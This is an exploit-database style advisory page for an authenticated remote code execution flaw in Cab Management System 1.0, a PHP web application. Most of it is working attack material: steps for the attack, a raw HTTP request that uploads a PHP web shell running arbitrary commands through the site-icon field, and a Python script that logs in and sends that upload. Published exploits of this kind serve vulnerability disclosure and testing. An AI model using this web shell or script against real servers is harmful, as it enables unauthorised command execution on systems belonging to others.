Cab Management System 1.0 Remote Code Execution

2022.02.23

Credit: Alperen Ergel

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html
# Version : 1.0
# Tested on: windows 10 xammp | Kali linux
# Category: WebApp
# Google Dork: N/A
# Date: 18.02.2022
######## Description ########
#
#
# Step 1: Login admin account and go settings of site
# Step 2: Update web site icon and selecet a webshell.php
# Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########
========>>> START REQUEST <<<=========
POST /cms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 11338
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml
Connection: close
<-- SNIPP HERE -->
------WebKitFormBoundaryc5vp1oayEolowCbb
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryc5vp1oayEolowCbb
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryc5vp1oayEolowCbb--
<-- SNIPP HERE -->
========>>> END REQUEST <<<=========
========>>> EXPLOIT CODE <<<=========
import requests
print("""
--------------------------------------------
| |
| Author: Alperen Ergel (@alpernae) |
| |
| CAB Management System v1 Exploit |
| |
--------------------------------------------
""")
username = input("Username: ")
password = input("Password: ")
URL = input("Domain: ")
burp0_url = "http://" + URL + "/cms/classes/Login.php?f=login"
burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://192.168.1.33", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://192.168.1.33/cms/admin/login.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
burp0_data = {"username": username, "password": password}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
FILE = input("File: ")
burp0_url = "http://" + URL + "/cms/classes/SystemSettings.php?f=update_settings"
burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://localhost", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost/cms/admin/?page=system_info", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
burp0_data = "------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nCab Management System\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nCMS - PHP\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[welcome]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[about]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + FILE + "\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb--\r\n"
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cab Management System 1.0 Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.